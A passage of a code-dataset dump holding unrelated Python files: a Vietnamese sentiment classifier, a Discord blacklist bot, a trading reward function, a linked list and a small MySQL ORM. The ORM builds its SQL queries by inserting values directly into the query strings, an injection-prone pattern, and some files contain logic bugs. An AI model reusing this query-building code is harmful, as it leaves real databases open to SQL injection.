< 2:\r\n if qu_or_gi:\r\n if len(chars) == 2:\r\n x, y = nguyen_am_to_ids.get(chars[1])\r\n chars[1] = bang_nguyen_am[x][dau_cau]\r\n else:\r\n x, y = nguyen_am_to_ids.get(chars[2], (-1, -1))\r\n if x != -1:\r\n chars[2] = bang_nguyen_am[x][dau_cau]\r\n else:\r\n chars[1] = bang_nguyen_am[5][dau_cau] if chars[1] == 'i' else bang_nguyen_am[9][dau_cau]\r\n return ''.join(chars)\r\n return word\r\n\r\n for index in nguyen_am_index:\r\n x, y = nguyen_am_to_ids[chars[index]]\r\n if x == 4 or x == 8: # ê, ơ\r\n chars[index] = bang_nguyen_am[x][dau_cau]\r\n return ''.join(chars)\r\n\r\n if len(nguyen_am_index) == 2:\r\n if nguyen_am_index[-1] == len(chars) - 1:\r\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[0]]]\r\n chars[nguyen_am_index[0]] = bang_nguyen_am[x][dau_cau]\r\n else:\r\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[1]]]\r\n chars[nguyen_am_index[1]] = bang_nguyen_am[x][dau_cau]\r\n else:\r\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[1]]]\r\n chars[nguyen_am_index[1]] = bang_nguyen_am[x][dau_cau]\r\n return ''.join(chars)\r\n\r\n\r\ndef is_valid_vietnam_word(word):\r\n chars = list(word)\r\n nguyen_am_index = -1\r\n for index, char in enumerate(chars):\r\n x, y = nguyen_am_to_ids.get(char, (-1, -1))\r\n if x != -1:\r\n if nguyen_am_index == -1:\r\n nguyen_am_index = index\r\n else:\r\n if index - nguyen_am_index != 1:\r\n return False\r\n nguyen_am_index = index\r\n return True\r\n\r\n\r\ndef chuan_hoa_dau_cau_tieng_viet(sentence):\r\n \"\"\"\r\n Chuyển câu tiếng Việt về chuẩn gõ dấu kiểu cũ.\r\n :param sentence:\r\n :return:\r\n \"\"\"\r\n sentence = sentence.lower()\r\n words = sentence.split()\r\n for index, word in enumerate(words):\r\n cw = re.sub(r'(^\\p{P}*)([p{L}.]*\\p{L}+)(\\p{P}*$)',\r\n r'\\1/\\2/\\3', word).split('/')\r\n if len(cw) == 3:\r\n cw[1] = chuan_hoa_dau_tu_tieng_viet(cw[1])\r\n words[index] = ''.join(cw)\r\n return ' '.join(words)\r\n\r\n\r\ndef remove_html(txt):\r\n return re.sub(r'<[^>]*>', '', txt)\r\n\r\n\r\ndef text_preprocess(document):\r\n # xóa html code\r\n document = remove_html(document)\r\n # chuẩn hóa unicode\r\n document = convert_unicode(document)\r\n # chuẩn hóa cách gõ dấu tiếng Việt\r\n document = chuan_hoa_dau_cau_tieng_viet(document)\r\n # tách từ\r\n document = ViTokenizer.tokenize(document)\r\n # đưa về lower\r\n document = document.lower()\r\n # xóa các ký tự không cần thiết\r\n document = re.sub(\r\n r'[^\\s\\wáàảãạăắằẳẵặâấầẩẫậéèẻẽẹêếềểễệóòỏõọôốồổỗộơớờởỡợíìỉĩịúùủũụưứừửữựýỳỷỹỵđ_]', ' ', document)\r\n # xóa khoảng trắng thừa\r\n document = re.sub(r'\\s+', ' ', document).strip()\r\n return document\r\n\r\n\r\n# Thống kê số lượng data theo nhãn\r\ncount = {}\r\nfor line in 
open('sentiment_analysis_train.txt', 'r', encoding='utf-8'):\r\n key = line.split()[0]\r\n count[key] = count.get(key, 0) + 1\r\n\r\nfor key in count:\r\n print(key, count[key])\r\n\r\n# Thống kê các word xuất hiện ở tất cả các nhãn\r\ntotal_label = 5\r\nvocab = {}\r\nlabel_vocab = {}\r\nfor line in open('sentiment_analysis_train.txt', 'r', encoding='utf-8'):\r\n words = line.split()\r\n # lưu ý từ đầu tiên là nhãn\r\n label = words[0]\r\n if label not in label_vocab:\r\n label_vocab[label] = {}\r\n for word in words[1:]:\r\n label_vocab[label][word] = label_vocab[label].get(word, 0) + 1\r\n if word not in vocab:\r\n vocab[word] = set()\r\n vocab[word].add(label)\r\n\r\ncount = {}\r\nfor word in vocab:\r\n if len(vocab[word]) == total_label:\r\n count[word] = min([label_vocab[x][word] for x in label_vocab])\r\n print\r\n\r\nsorted_count = sorted(count, key=count.get, reverse=True)\r\nfor word in sorted_count[:100]:\r\n print(word, count[word])\r\n\r\n# loại stopword khỏi dữ liệu\r\nstopword = set()\r\nwith open('stopwords.txt', 'w', encoding=\"utf-8\") as fp:\r\n for word in sorted_count[:100]:\r\n stopword.add(word)\r\n fp.write(word + '\\n')\r\n\r\n\r\ndef remove_stopwords(line):\r\n words = []\r\n for word in line.strip().split():\r\n if word not in stopword:\r\n words.append(word)\r\n return ' '.join(words)\r\n\r\n\r\nwith open('sentiment_analysis.prep', 'w', encoding=\"utf-8\") as fp:\r\n for line in open('sentiment_analysis_train.txt', encoding=\"utf-8\"):\r\n line = remove_stopwords(line)\r\n fp.write(line + '\\n',)\r\n\r\n\r\n# Chia tập train/test\r\ntest_percent = 0.2\r\n\r\ntext = []\r\nlabel = []\r\n\r\nfor line in open('sentiment_analysis.prep', encoding=\"utf-8\"):\r\n words = line.strip().split()\r\n label.append(words[0])\r\n text.append(' '.join(words[1:]))\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(\r\n text, label, test_size=test_percent, random_state=42)\r\n\r\n# Lưu train/test data\r\n# Giữ nguyên train/test để về sau so sánh các mô hình cho công bằng\r\nwith open('train.txt', 'w', encoding=\"utf-8\") as fp:\r\n for x, y in zip(X_train, y_train):\r\n fp.write('{} {}\\n'.format(y, x))\r\n\r\nwith open('test.txt', 'w', encoding=\"utf-8\") as fp:\r\n for x, y in zip(X_test, y_test):\r\n fp.write('{} {}\\n'.format(y, x))\r\n\r\n# encode label\r\nlabel_encoder = LabelEncoder()\r\nlabel_encoder.fit(y_train)\r\nprint(list(label_encoder.classes_), '\\n')\r\ny_train = label_encoder.transform(y_train)\r\ny_test = label_encoder.transform(y_test)\r\n\r\nprint(X_train[0], y_train[0], '\\n')\r\nprint(X_test[0], y_test[0])\r\n\r\nMODEL_PATH = \"models\"\r\nif not os.path.exists(MODEL_PATH):\r\n os.makedirs(MODEL_PATH)\r\n\r\n\r\n# Linear Classifier\r\n\r\nstart_time = time.time()\r\ntext_clf = Pipeline([('vect', CountVectorizer(ngram_range=(1, 1),\r\n max_df=0.8,\r\n max_features=None)),\r\n ('tfidf', TfidfTransformer()),\r\n ('clf', LogisticRegression(solver='lbfgs',\r\n multi_class='auto',\r\n max_iter=10000))\r\n ])\r\ntext_clf = text_clf.fit(X_train, y_train)\r\n\r\ntrain_time = time.time() - start_time\r\nprint('Done training Linear Classifier in', train_time, 'seconds.')\r\n\r\npickle.dump(text_clf, open(os.path.join(\r\n MODEL_PATH, \"linear_classifier.pkl\"), 'wb'))\r\n\r\n\r\n# Đánh giá mô hình\r\n# Linear Classifier\r\nmodel = pickle.load(\r\n open(os.path.join(MODEL_PATH, \"linear_classifier.pkl\"), 'rb'))\r\ny_pred = model.predict(X_test)\r\nprint('Linear Classifier, Accuracy =', np.mean(y_pred == y_test))\r\n\r\n# Xem kết quả trên từng nhãn\r\nln_model = 
pickle.load(\r\n open(os.path.join(MODEL_PATH, \"linear_classifier.pkl\"), 'rb'))\r\ny_pred = ln_model.predict(X_test)\r\nprint(classification_report(y_test, y_pred,\r\n target_names=list(label_encoder.classes_)))\r\n\r\n\r\nfor line in open('sentiment_analysis_test.txt', 'r', encoding='utf-8'):\r\n document = line\r\n document = text_preprocess(document)\r\n document = remove_stopwords(document)\r\n label = ln_model.predict([document])\r\n f = open(\"sentiment_analysis_result.txt\", \"a\", encoding=\"utf-8\")\r\n words = label_encoder.inverse_transform(label)[0], line\r\n words = \" \".join(words)\r\n f.write(words)\r\n","sub_path":"sentiment_analysis.py","file_name":"sentiment_analysis.py","file_ext":"py","file_size_in_byte":12467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"129545405","text":"import discord\nimport os\nimport pickle\nfrom discord.ext import commands\nfrom discord.utils import get\n\nif os.path.isfile(\"files/blacklist.dat\"):\n try:\n with open(\"files/blacklist.dat\", \"rb\") as blacklist:\n blacklisted = pickle.load(blacklist)\n\n except EOFError:\n blacklisted = []\n\nelse:\n print(\"blacklist.dat is either deleted or corrupted! Please check and try again.\")\n\nclass serverCog(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n @commands.command()\n @commands.has_any_role(\"Admins\", \"Moderators\")\n async def blacklist(self, nes, user_id: str):\n if len(user_id) > 16 or len(user_id) < 22 and user_id.isdigit():\n if user_id in blacklisted:\n await nes.send(f\"User already exists!\")\n\n else:\n blacklisted.append(user_id)\n await nes.send(f\"User blacklisted.\")\n\n else:\n await nes.send(f\"Invalid User ID! Please try again.\")\n\n @commands.command()\n @commands.has_any_role(\"Admins\", \"Moderators\")\n async def listblacklist(self, nes):\n listBlacklist = str(blacklisted)[1:-1]\n\n if not blacklisted:\n \tawait nes.send(f\"No one is blacklisted.\")\n\n else:\n await nes.send(\"List of User IDs blacklisted - `{}`\" .format(listBlacklist))\n\n @commands.command()\n @commands.has_any_role(\"Admins\", \"Moderators\")\n async def unblacklist(self, nes, type_: str, user_id: str):\n if len(user_id) == 18 and user_id.isdigit():\n if user_id in blacklisted:\n blacklisted.remove(user_id)\n await nes.send(f\"User unblacklisted.\")\n\n else:\n await nes.send(f\"User doesn't exist! Please try again.\")\n\n else:\n await nes.send(f\"Invalid User ID! 
Please try again.\")\n\n @commands.command()\n async def pol(self, nes):\n author = nes.message.author\n id = str(nes.message.author.id)\n role = get(author.guild.roles, name = \"Politics\")\n\n if id in blacklisted:\n await nes.send(f\"Sorry, you have been blacklisted.\")\n return\n\n elif role in author.roles:\n await nes.send(f\"You already have the role!\")\n\n else:\n await author.add_roles(role)\n await nes.send(f\"Role assigned to you.\")\n\n @commands.command()\n async def unpol(self, nes):\n author = nes.message.author\n id = str(nes.message.author.id)\n role = get(author.guild.roles, name = \"Politics\")\n\n if id in blacklisted:\n await nes.send(f\"Sorry, you have been blacklisted.\")\n return\n\n elif not role in author.roles:\n await nes.send(f\"You already don't have the role!\")\n\n else:\n await author.remove_roles(role)\n await nes.send(f\"Role removed from you.\")\n\ndef setup(client):\n client.add_cog(serverCog(client))","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"414799506","text":"import math\r\n\r\ndef whoIsNext(names, r):\r\n n = len(names)\r\n k = 2 ** int(math.log(1 + (r - 1) // n, 2))\r\n s = 1 + (k - 1) * n\r\n return names[(r - s) // k]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nnames = [\"Sheldon\", \"Leonard\", \"Penny\", \"Rajesh\", \"Howard\"]\r\nr = 20\r\n\r\nprint(whoIsNext(names, 7230702951))\r\n","sub_path":"learn17.py","file_name":"learn17.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"421914376","text":"from mini_crawler import MiniCrawler\nimport os\nimport json\n\nCONFIG_PATH=\"../../config/twitter_config.json\"\nOUTPUT_FOLDER = \"test_data\"\nTERMS = [\"covid\", \"coronavirus\", \"covid-19\", \"#covid-19\", \"#coronavirus\"]\n\ndef test_constructor():\n crawler = MiniCrawler(config_path=CONFIG_PATH, output_folder=OUTPUT_FOLDER)\n print(crawler.output_folder)\n\ndef test_config():\n config_path = CONFIG_PATH\n config = None\n with open(os.path.abspath(config_path), 'r') as config_f:\n config = json.load(config_f)\n apikeys = list(config['apikeys'].values()).pop()\n print(apikeys)\n\ndef test_crawler():\n crawler = MiniCrawler(config_path=CONFIG_PATH, output_folder=OUTPUT_FOLDER)\n result = crawler.search_by_terms(TERMS, 10, output_to_file=True)\n #print(result)\n n = 1\n for tweet in result:\n print(\"Tweet {}:\".format(n))\n print(tweet[\"text\"])\n print(\"\\n\")\n n += 1\n\ntest_constructor()\ntest_config()\n\n#commented just in case, uncomment to test\n#test_crawler()\n\n","sub_path":"service_composition/mini_crawler/test_crawler.py","file_name":"test_crawler.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"607521174","text":"import os\nimport sys\nimport string\nimport time\nimport random\nimport datetime\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.metrics import f1_score\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom scipy import sparse\nimport lightgbm as lgb\n\n#current_path = os.path.split(os.path.realpath(__file__))[0]\ncurrent_path = os.path.split(os.path.realpath(__file__))[0]\n# current_path = './atad/'\n# current_path = 
'F:/github_me_repos/data_competition/kdxf2019_mobileAD/'\nos.chdir(current_path)\n\ndef generate_muffle_files(file_num=100):\n start_t = time.time()\n\n def file_number_under_path(dirname):\n result = [] # 所有的文件\n for maindir, subdir, file_name_list in os.walk(dirname):\n for filename in file_name_list:\n file_path = os.path.join(maindir, filename) # 合并成一个完整路径\n result.append(file_path)\n return len(result)\n\n def gen_content(line_num=25):\n candidate_chs = string.digits + string.ascii_letters\n content = ''\n for i in range(line_num):\n content += ''.join(random.choices(candidate_chs, k=120)) + '\\n'\n # print('content is ', content)\n return content\n\n def gen_rand_file(file_name_len=16):\n all_candidate_chs = string.digits + string.ascii_letters\n upper_letters = ''.join(set(string.ascii_uppercase) - set('AGMS'))\n print('upper_letters is ', upper_letters)\n print(all_candidate_chs)\n file_name = ''\n for i in range(file_name_len):\n if i<=2:\n file_name += random.choice(upper_letters)\n else:\n file_name += random.choice(all_candidate_chs)\n print('file_name is ', file_name)\n with open(current_path + '/temp_data/' + file_name + '.txt', 'w') as file:\n file.write(gen_content())\n return file_name\n\n # print('file_number is ', file_number_under_path(current_path + '/temp_data/'))\n\n for i in range(file_num):\n gen_rand_file()\n print('generate_muffle_files cost time ', time.time()-start_t)\n\ngenerate_muffle_files()\n\nsys.exit(0)\n\ndf_train = pd.read_csv(current_path + '/data/round1_iflyad_anticheat_traindata.txt', sep='\\t')\nprint('df_train.shape is ', df_train.shape, df_train.head(10), list(df_train.columns)) # (1000000, 29)\n\ndf_test = pd.read_csv(current_path + '/data/round1_iflyad_anticheat_testdata_feature.txt', sep='\\t')\nprint('df_test.shape is ', df_test.shape, df_test.head(10), list(df_test.columns))\n\ndf_merged = pd.concat([df_train, df_test])\ndf_merged = df_merged.sample(250000)\n\ndf_merged = df_merged.fillna(-1)\n\n# df_merged['year'] = df_merged['nginxtime'].apply(lambda x: int(time.strftime(\"%Y\", time.localtime(x//1000))))\n# df_merged['month'] = df_merged['nginxtime'].apply(lambda x: int(time.strftime(\"%m\", time.localtime(x//1000))))\n# df_merged['day'] = df_merged['nginxtime'].apply(lambda x: int(time.strftime(\"%d\", time.localtime(x//1000))))\ndf_merged['hour'] = df_merged['nginxtime'].apply(lambda x: int(time.strftime(\"%H\", time.localtime(x//1000))))\ndf_merged['minute'] = df_merged['nginxtime'].apply(lambda x: int(time.strftime(\"%M\", time.localtime(x//1000))))\n\ndel df_merged['nginxtime']\n\n# media_cate_feature = ['pkgname', 'ver', 'adunitshowid', 'mediashowid', 'apptype']\nmedia_cate_feature = ['ver', 'apptype']\n# ip_cate_feature = ['reqrealip', 'city', 'province']\nip_cate_feature = ['city', 'province']\n# device_cate_feature = ['carrier', 'os', 'osv', 'ntt', 'model', 'make', 'ppi']\ndevice_cate_feature = []\norigin_cate_list = media_cate_feature + ip_cate_feature + device_cate_feature\n\nprint('get here 111')\n\n# 编码,加速\nfor i in origin_cate_list:\n df_merged[i] = df_merged[i].map(dict(zip(df_merged[i].unique(), range(0, df_merged[i].nunique()))))\n\nprint('df_merged.shape is ', df_merged.shape, df_merged.columns)\n\ncount_feature_list = []\n\n# print('df_merged[\"label\"] ', df_merged[['year', 'month', 'day', 'hour', 'minute', 'nginxtime']])\n\ndef feature_count(data, features=[], is_feature=True):\n print('in feature_count()')\n if len(set(features)) != len(features):\n print('equal feature !!!!')\n return data\n new_feature = 'count'\n 
nunique = []\n for i in features:\n nunique.append(data[i].nunique())\n new_feature += '_' + i.replace('add_', '')\n if len(features) > 1 and len(data[features].drop_duplicates()) <= np.max(nunique):\n print(new_feature, 'is unvalid cross feature:')\n return data\n temp = data.groupby(features).size().reset_index().rename(columns={0: new_feature})\n data = data.merge(temp, 'left', on=features)\n if is_feature:\n count_feature_list.append(new_feature)\n # print('in feature_count, data.shape: {}, features: {}, new_feature: {}'.format(\n # data.shape, features, new_feature))\n return data\n\n\n\nfor i in origin_cate_list:\n n = df_merged[i].nunique()\n if n > 5:\n df_merged = feature_count(df_merged, [i])\n # data = feature_count(data, ['day', 'hour', i])\n else:\n print('feature: ', i, ' nunique less than 5')\n\nprint('after add feature_count, df_merged.shape is ', df_merged.shape, df_merged.columns)\n\ncate_feature = origin_cate_list\nnum_feature = ['h', 'w', 'hour', 'minute'] + count_feature_list\nfeature = cate_feature + num_feature\n\n# predict = data[(data.label == -1) & (data.data_type == 2)]\npredict = df_merged[(df_merged.label == -1)]\n\npredict_result = predict[['sid']]\npredict_result['predicted_score'] = 0\npredict_x = predict.drop('label', axis=1)\ntrain_x = df_merged[df_merged.label != -1].reset_index(drop=True)\ntrain_y = train_x.pop('label').values\nbase_train_csr = sparse.csr_matrix((len(train_x), 0))\nbase_predict_csr = sparse.csr_matrix((len(predict_x), 0))\n\nenc = OneHotEncoder()\nfor feature in cate_feature:\n print('one-hot processing feature:', feature)\n enc.fit(df_merged[feature].values.reshape(-1, 1))\n base_train_csr = sparse.hstack((base_train_csr, enc.transform(train_x[feature].values.reshape(-1, 1))),\n 'csr', 'bool')\n base_predict_csr = sparse.hstack((base_predict_csr, enc.transform(predict[feature].values.reshape(-1, 1))),\n 'csr', 'bool')\nprint('one-hot prepared !')\n\ntrain_csr = sparse.hstack(\n (sparse.csr_matrix(train_x[num_feature]), base_train_csr), 'csr').astype('float32')\n\npredict_csr = sparse.hstack(\n (sparse.csr_matrix(predict_x[num_feature]), base_predict_csr), 'csr').astype('float32')\n\n\nprint('train_csr.shape is ', train_csr.shape,\n 'predict_csr.shape is ', predict_csr.shape)\n\nprint('get here 777')\n\n# sys.exit(0)\n\nlgb_model = lgb.LGBMClassifier(\n boosting_type='gbdt', num_leaves=61, reg_alpha=3, reg_lambda=1,\n max_depth=-1, n_estimators=500, objective='binary',\n subsample=0.8, colsample_bytree=0.8, subsample_freq=1,\n learning_rate=0.035, random_state=2018, n_jobs=10\n)\nskf = StratifiedKFold(n_splits=5, random_state=2018, shuffle=True)\n\nfinal_f1_score = []\nbest_score = []\n\nfor index, (train_index, test_index) in enumerate(skf.split(train_csr, train_y)):\n print('in enumerate 888, index: ', index)\n print('len of train_index', len(train_index), 'len of test_index', len(test_index))\n lgb_model.fit(train_csr[train_index], train_y[train_index],\n eval_set=[(train_csr[train_index], train_y[train_index]),\n (train_csr[test_index], train_y[test_index])], early_stopping_rounds=200, verbose=10)\n best_score.append(lgb_model.best_score_['valid_1']['binary_logloss'])\n print(best_score)\n\n partial_pred = lgb_model.predict(train_csr[test_index], num_iteration=lgb_model.best_iteration_)\n f1 = f1_score(train_y[test_index], partial_pred, average='macro')\n final_f1_score.append(f1)\n print('f1 is ', f1)\n print('final_f1_score is ', final_f1_score)\n\n test_pred = lgb_model.predict_proba(predict_csr, 
num_iteration=lgb_model.best_iteration_)[:, 1]\n    test_pred_outcome = lgb_model.predict(predict_csr, num_iteration=lgb_model.best_iteration_).astype(int)\n    test_pred_outcome_from_val = (test_pred > 0.5).astype(int)\n\n    print('test_pred.head(20)', test_pred[:20])\n    print('test_pred_outcome_from_val.head(20)', test_pred_outcome_from_val[:20])\n    print('test_pred_outcome.head(20)', test_pred_outcome[:20])\n\n    print()\n\n    predict_result['predicted_score'] = predict_result['predicted_score'] + test_pred\n\npredict_result['predicted_score'] = predict_result['predicted_score'] / 5.0\n\npredict_result['label'] = (predict_result['predicted_score'].values > 0.5)\npredict_result['label'] = predict_result['label'].astype(int)\n\nnow_str = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\npredict_result[['sid', 'label']].to_csv(current_path + '/submission/lgb_outcome_{}.csv'.format(now_str),\n                                        index=False)\n\nprint('ends here!')\n\n\n\n\n\n\n\n","sub_path":"kkbox-music-recommendation-challenge/model_tsg.py","file_name":"model_tsg.py","file_ext":"py","file_size_in_byte":8989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"288060451","text":"# LinkedList: A doubly-linked list.\n# Bonus: Has an insert_in_order that, when used, keeps the values of\n# each node in ascending order.\n# Implement as many operations as possible with recursion.\n# If you can't figure it out recursively, use a loop. (But then refactor\n# your implementation into a recursive one!)\n# Your implementation should pass the tests in test_sorted_list.py.\n# YOUR NAME\n\n# class Node:\n#     def __init__(self, next, prev, value):\n#         self.value = value\n#         self.next = None\n#         self.prev = None\n#         return\n\n#     def get_data(self):\n#         return self.value\n\nclass LinkedList:\n    def __init__(self, value = None):\n        self.value = value\n        self.next = self\n        self.prev = self\n\n    def is_sentinel(self):\n        if self.value is None:\n            return True\n        return False\n\n    def is_empty(self):\n        if self.next != self or self.prev != self:\n            return False\n        return True\n\n    def is_last(self):\n        #returns boolean variable whether a node is last\n        if self.next.is_sentinel():\n            return True\n        return False\n    \n    def last(self): \n        #returns last node\n        if self.is_last():\n            return self #if next node is sentinel node, this node is the last.\n        else:\n            self = self.next\n            return self.last() #\n\n    def append(self, new_node):\n        if self.is_empty():\n            self.next = new_node\n            new_node.next = self\n            new_node.prev = self\n            self.prev = new_node\n        elif self.is_sentinel():\n            new_node.next = self\n            self.prev = new_node\n            self = self.last()\n            new_node.prev = self\n            self.next = new_node\n        else:\n            self = self.next\n            self.append(new_node)\n\n    def delete(self):\n        if self.is_empty():\n            return None\n        else:\n            self.prev.next = self.next\n            self.next.prev = self.prev\n    \n    def insert(self, insertee):\n        #delegates to append so the node is linked at the end of the list\n        self.append(insertee)\n\n\n","sub_path":"linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"431432216","text":"import logging\n\n\nDATA = [\n    {'currency': 'AUDUSD', 'trail': 60, 'intervals': [1440], 'pip_mul': 10000},\n\n    {'currency': 'EURGBP', 'trail': 50, 'intervals': [1440], 'pip_mul': 10000},\n\n    {'currency': 'EURUSD', 'trail': 15, 'intervals': [1440], 'pip_mul': 10000},\n\n    {'currency': 'EURJPY', 'trail': 150, 'intervals': [1440], 'pip_mul': 100},\n\n    {'currency': 'GBPUSD', 'trail': 40, 'intervals': [1440], 
'pip_mul': 10000},\n\n {'currency': 'GBPJPY', 'trail': 150, 'intervals': [1440], 'pip_mul': 100},\n\n {'currency': 'NZDUSD', 'trail': 60, 'intervals': [1440], 'pip_mul': 10000},\n # 7 mar 40\n # 9 mar 60\n\n {'currency': 'USDCAD', 'trail': 60, 'intervals': [1440], 'pip_mul': 10000},\n\n {'currency': 'USDCHF', 'trail': 50, 'intervals': [1440], 'pip_mul': 10000},\n # 7 mar 40\n # 9 mar 50\n\n {'currency': 'USDJPY', 'trail': 30, 'intervals': [1440], 'pip_mul': 100},\n]\n\nPERIODS = [5, 21]\n\n\ndef getState(df, periods):\n logging.info('State: periods {0}...'.format(periods))\n\n s = []\n row = df.iloc[0]\n\n for x in periods:\n s.append('1' if row['ma_{0}_bullish'.format(x)] else '0')\n s.append('1' if row['ma_{0}_divergence'.format(x)] else '0')\n s.append('1' if row['ma_{0}_magnitude'.format(x)] else '0')\n\n for y in periods:\n if y <= x:\n continue\n s.append('1' if row['ma_{0}_crossover_{1}_bullish'.format(x, y)] else '0')\n s.append('1' if row['ma_{0}_crossover_{1}_divergence'.format(x, y)] else '0')\n s.append('1' if row['ma_{0}_crossover_{1}_magnitude'.format(x, y)] else '0')\n # logging.debug('State: moving average {0}'.format(s))\n\n s_string = ''.join(s)\n logging.debug('State: {0}'.format(s_string))\n\n return s_string\n\n\ndef getReward(df, a, pip_mul):\n a_trade, a_trailing = a.split('-')\n logging.info('Reward: {0} with {1} stoploss'.format(a_trade, a_trailing))\n\n entry = df.iloc[0]['close']\n logging.debug('Reward: entry at {0:.4f}'.format(entry))\n if a_trade == 'buy':\n trail = -(float(a_trailing) / pip_mul)\n elif a_trade == 'sell':\n trail = (float(a_trailing) / pip_mul)\n else:\n raise Exception('Unknown trade type {0}'.format(a_trade))\n take = entry + trail\n logging.debug('Reward: trail at {0:.4f}'.format(trail))\n\n ticks = -1\n r = 0\n for i, row in df.iterrows():\n ticks += 1\n logging.debug('Reward: {0} {1} {2:.4f} stop {3:.4f}'.format(a_trade, i, row['close'], take))\n # buy\n if a_trade == 'buy':\n # exit?\n if row['low'] < take:\n logging.debug('Reward: take profit triggered: low [{0:.4f}] < take [{1:.4f}]'.format(row['low'], take))\n r += take - entry\n break\n # new high?\n if row['high'] + trail > take:\n logging.debug('Reward: new high: high [{0:.4f}] + trail [{1:0.4f}] > take [{2:.4f}]'.format(row['high'], trail, take))\n take = row['high'] + trail\n # sell\n if a_trade == 'sell':\n # exit?\n if row['high'] > take:\n logging.debug('Reward: take profit triggered: high [{0:.4f}] > take [{1:.4f}]'.format(row['high'], take))\n r += entry - take\n break\n # new low?\n if row['low'] + trail < take:\n logging.debug('Reward: new low: low [{0:.4f}] + trail [{1:0.4f}] < take [{2:.4f}]'.format(row['low'], trail, take))\n take = row['low'] + trail\n\n r -= (ticks * 2) / pip_mul\n\n return r, ticks\n","sub_path":"16_rf_ma/beta/world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"12919762","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport traceback\r\nfrom common import mysql\r\n\r\n'''\r\nmysql orm\r\nclass User(Model):\r\n __table__ = 'users'\r\n __primary_key__ = dict(\r\n id = '',\r\n )\r\n __fields__ = dict(\r\n email = '',\r\n passwd = '',\r\n admin = 0,\r\n name = '',\r\n image = '',\r\n created_at = '',\r\n )\r\n\r\n'''\r\n\r\n__author__ = 'Sola'\r\n\r\nclass ModelMetaclass(type):\r\n def __new__(cls, name, bases, attrs):\r\n if name == 'Model':\r\n return type.__new__(cls, name, bases, attrs)\r\n\r\n tableName = 
attrs.get('__table__', None) or name\r\n if not attrs.get('__primary_key__', None):\r\n raise RuntimeError('table[%s] Primary key not found' % tableName)\r\n if '__fields__' not in attrs:\r\n raise RuntimeError('table[%s] fields not found' % tableName)\r\n\r\n attrs['__table__'] = tableName\r\n\r\n escaped_fields = list(map(lambda f: '`%s`' % f, attrs.get('__fields__')))\r\n escaped_keys = list(map(lambda f: '`%s`' % f, attrs.get('__primary_key__')))\r\n attrs['__select__'] = 'select %s, %s from `%s`' % (', ' . join(escaped_keys), ', ' . join(escaped_fields), tableName)\r\n return type.__new__(cls, name, bases, attrs)\r\n\r\n\r\nclass Model(dict, metaclass=ModelMetaclass):\r\n def __init__(self, insert=None, **kw):\r\n self._dirty = dict()\r\n self._insert = insert\r\n #default value\r\n for k, v in self.__primary_key__.items():\r\n if k not in kw:\r\n kw[k] = v\r\n for k, v in self.__fields__.items():\r\n if k not in kw:\r\n kw[k] = v\r\n elif not self._insert:\r\n self._dirty[k] = True\r\n dict.__init__(self, **kw)\r\n\r\n\r\n def __getattr__(self, key):\r\n try:\r\n return self[key]\r\n except KeyError:\r\n raise AttributeError(r\"Model[%s] object has no attribute '%s'\" % (self.__class__.__name__, key))\r\n\r\n def __setattr__(self, key, value):\r\n self[key] = value\r\n\r\n def __setitem__(self, key, value):\r\n if key in self.__primary_key__:\r\n raise RuntimeError('some one try change table[%s] primary key' % self.__table__)\r\n\r\n if key in self.__fields__:\r\n self._dirty[key] = True\r\n\r\n dict.__setitem__(self, key, value)\r\n\r\n @classmethod\r\n async def find(self, where=None, **kw):\r\n if where:\r\n sql = self.__select__ + where\r\n else:\r\n param = ''\r\n for k, v in kw.items():\r\n param += '`%s`' % k + ' = ' + str(v)\r\n if len(param) == 0:\r\n sql = self.__select__\r\n else:\r\n sql = '%s where %s' % (self.__select__, param)\r\n rs, _ = await mysql.execute(sql)\r\n if len(rs) == 0:\r\n return []\r\n return list(map(lambda f: self(**f, insert=True), rs))\r\n\r\n async def save(self):\r\n if self._insert:\r\n print(self._dirty)\r\n if len(self._dirty) == 0:\r\n return\r\n temp_keys = []\r\n temp_values = []\r\n for k in self.__primary_key__.keys():\r\n temp_keys.append(\"`%s`='%s'\" % (k, str(self[k])))\r\n\r\n for k in self._dirty.keys():\r\n temp_values.append(\"`%s`='%s'\" % (k, str(self[k])))\r\n\r\n sql = 'update `%s` set %s where %s' % (self.__table__, ', ' . join(temp_values), 'and '. join(temp_keys))\r\n else:\r\n temp_keys = []\r\n temp_values = []\r\n for k in self.__primary_key__.keys():\r\n temp_keys.append(k)\r\n temp_values.append(str(self[k]))\r\n for k in self._dirty.keys():\r\n temp_keys.append(k)\r\n temp_values.append(str(self[k]))\r\n\r\n escaped_keys = list(map(lambda f: '`%s`' % f, temp_keys))\r\n escaped_values = list(map(lambda f: \"'%s'\" % f, temp_values))\r\n sql = 'insert into `%s` (%s) values (%s)' % (self.__table__, ', ' . join(escaped_keys), ', ' . 
